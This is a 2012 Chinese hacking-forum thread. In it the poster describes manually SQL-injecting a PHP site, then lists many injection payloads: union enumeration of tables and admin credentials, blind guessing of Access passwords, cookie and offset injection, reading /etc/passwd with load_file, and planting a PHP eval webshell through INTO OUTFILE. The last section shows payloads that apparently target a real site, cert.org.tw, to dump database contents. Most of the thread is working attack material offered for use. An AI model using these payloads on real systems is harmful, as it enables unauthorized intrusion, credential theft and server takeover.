找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2873|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~, `5 n& L- X. L/ ]$ g+ `
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?0 Q7 h# {$ I5 S# G; y& d
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。: h; v4 d- x$ |; T& A% e' V! B; h+ G
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
, c, _' V$ B& P: w9 H8 o3 k1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
6 v2 C4 L5 Y4 K2 o这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
- j2 {- Q% M; d. s5 l% u* L, V. cWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in$ D2 I4 P+ h& p; ?, ]( X4 k
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入$ E3 W9 \! T3 j* |9 I/ V% r
                        
! H) H1 M% Y7 `$ x: ?/ @0 k7 c2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
0 h4 e! w. k4 Y5 V" d# _3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
7 E$ V. K5 r7 ^5 V) W4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
; v/ t' _  p# V! l5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。: R, l6 s/ K' ?% m- L3 g; ^
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,7 s  V" d7 T' B. z
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
$ t  q/ u0 ]0 l$ T7 H8 ^1 m4 f我就用的是第二个思路,  J7 V3 P2 ^4 U; k" H% {# e
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
4 e9 a& F1 }- Y5 w" ^/ h6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
. k. S! ?/ q; _1 c3 ]4 y提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
7 D9 Q3 W& P: r+ c3 \/ {注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。) V( d& F8 b. z9 C! B- ?5 s
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????: N; C/ J0 t4 s+ j- y; B# f' c
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
0 V# l0 a" J9 f) S* e$ K提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
& L, x, ?  i1 z" j; Z3 ?然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
5 T, q9 b; `" ?$ F  n2 x调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
- z3 O: l) Q# u5 F" C下面是一些很普遍注入方式资料:
3 l: A6 v. b$ |$ `注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='1 ~; x0 ^6 K! ?! @$ J" ^) f
拆半法
3 N9 W, k' j$ T1 a! D) c% F6 ]6 e7 A4 [######################################. q. K" I, p! ^% v+ X
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。- K7 `3 C6 ~3 ]
and exists (select * from admin)
, K6 a) u1 X+ ~3 G* N0 b! I0 n" hand exists(select id from admin)
: w" G0 l  L0 Aand exists(select id from admin where id=1)
7 O" }9 o6 z' o* O, M7 Sand exists(select id from admin where id>1)
5 ^0 x6 J! l1 x; m1 [3 K然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 4 m1 j3 a# z) C0 Y. L# g/ z# q
and exists (select username from admin)
! B  @: E- @9 Mand exists (select password from admin)
2 W& w3 C! n+ b% oand exists (select id from admin where len(username)<10 and id=1)% q3 ^: q, f; Z& a0 A
and exists (select id from admin where len(username)>5 and id=1)! _( ~% s4 V9 \: q
and exists (select id from admin where len(username)=6 and id=1)& l' E, W$ k' m# a
and exists (select id from admin where len(password)<10 and id=1)
( z! J* ]4 h' tand exists (select id from admin where len(password)>5 and id=1)# m( W3 Q) i$ w' g5 v
and exists (select id from admin where len(password)=7 and id=1)
. U. c' T0 H4 s4 ^3 }5 \and (select top 1 asc(mid(username,1,1)) from admin)=97
5 g6 S2 j! a' P, l0 r- e! N返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。4 c& u; M( L2 u9 m; w2 K# [
猜第二位把username,1,1改成username,2,1就可以了。) A" q" ^2 E9 t7 c
猜密码把username改成password就OK了- m3 ~# I/ Q9 y8 t$ u
##################################################
; T- @  K% h3 c0 |* d搜索型注入2 n2 z. a; ^5 g) @  D2 }
##################################8 G3 q& Q- {; ?, z! l1 M. w
%' and 1=1 and '%'='
3 E; R( @/ E! U" Z. I, W%' and exists (select * from admin) and '%'='0 w1 L* n5 u9 u
%' and exists(select id from admin where id=1) and '%'='" k/ E4 a3 ^# l- ]. |
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='7 I: f, F* _7 v
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='1 ^1 g+ @8 W4 J* l- L1 F' T
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
* P4 N2 U/ j: _- {4 @$ k) d; p这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='4 A! y! C+ X& T7 E+ n
对于MSSQL数据库,后面可以吧 and '%'='换成--5 Y4 y9 L3 y' \9 o4 P
还有一点搜索型注入也可以使用union语句。( N1 F/ R& Y, J2 R# p1 m
######################################################### \+ c/ ^$ e: ]3 U/ g3 N' B
联合查询。" C- [& n" d( H, o2 b& \
###################################### J" a9 k- t# V0 k- K5 P
order by 10
/ `/ M% m: {: Z1 y# G$ t/ jand 1=2 union select 1,2,3,4,5,6,7,8,9,10
# k* Q/ _: U# U8 f  D' I( Oand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
  v( l  T- Y) M. t) L; L& Fand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
: z- O  r6 f4 V3 A3 }很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
* y: b& n/ j  N( I###################################
4 U; N; \7 l8 V) lcookie注入$ m& q. n% d0 a4 g3 w$ `
###############################
# J0 q! ~( O; w2 f, V; Chttp://www.******.com/shownews.asp?id=127) G, }0 l; H4 O8 `6 @  ?6 i  X; T
http://www.******.com/shownews.asp
6 ]  p7 ~$ r3 r% c0 n) Halert(="id="+escape("127"));, c+ s+ B$ {+ @/ d( k
alert(="id="+escape("127 and 1=1"));+ A3 E1 B# \# j, p: S/ k
alert(="id="+escape("127 order by 10"));$ w# }9 M: N1 q1 o" b- U5 Q
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));  i7 i& A" N8 I; i
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
# A+ s/ H/ J2 b( ?$ V! v- A/ Y. r这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。9 J4 _7 j- @# Q0 \
###################################+ `% d) l  r4 T9 C
偏移注入
8 ?0 g! u1 S% w  e8 N1 i% P###########################################################
- @" n3 q! J4 |union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin4 k$ n4 O5 \5 s) s% Y( b, \
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
, T  A% L& f) R3 z0 I# N; l3 ^union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)! g# h) [7 A( ?& N
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
3 m+ S; L6 k! x, C8 I' Runion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
/ ~+ s5 V7 E, ~3 a* k+ ~( J, d$ }union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
5 N2 ]4 D& u6 y4 H* ^! d) Z, X1 ~union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on, a! S( [$ c4 A( X" @/ {  o5 n
a.id=d.id)
4 L: B: |0 T. S% E# F# z% eand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
5 t% s" X( \2 r. g0 w( S! W5 xand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
+ |. E9 ^1 j9 p( q$ U4 b  
$ E8 T( V9 O! D! ~7 h% n  Y============================================================================================================
& B+ v; M$ n' C2 ^1.判断版本
& Y* V: O( y* E3 Xand ord(mid(version(),1,1))>51
0 r3 {( `- N" i  _" _! j返回正常,说明大于4.0版本,支持ounion查询
' @: ?5 k$ `; C, c/ Z! Q5 e2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解& I$ l2 P# Y3 {4 V, \
and 2=4 union select 1,2,3,4,5,6,7,8,9--
- q/ Q& `: Q# f4 {1 g2 p2 k8 C' [3.查看数据库版本及当前用户,3 y5 Z0 z/ d' U4 e' t( w
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
9 W& U  ]6 o# d  ]7 g* |, G  `3 Q% ^数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
. F. t9 v2 r9 a' |4.判断有没有写权限
: C: b% E8 n. o8 S3 c. v& Aand (select count(*) from MySQL.user)>0-- - ~: G, [4 o4 P0 Z
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1, H; f. @. K$ u. r8 |  c
用不了这个命令,就学习土耳其黑客手法,如下5 Z$ o% z- w0 H$ B
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
; x3 A/ o: k9 J4 G- G- X: Q: Y6.爆表,爆库8 J5 h  o0 F/ M* Z
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--0 d4 s% P& _5 j0 b# ^5 B' N
7.爆列名,爆表. m) X! ?# W  C3 S" ]" {  U
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--% |  g3 r% U) E9 ~3 z( F6 O5 J
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。: q: Z8 O$ B8 c) J, B( c: j+ f
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
4 y3 r+ w8 ?, r5 ]  ]0 P, G9.爆字段内容% o' R' J5 s$ w! _. l  X
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--. ?$ o  a! D! k! i5 a  i" i/ O: K
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表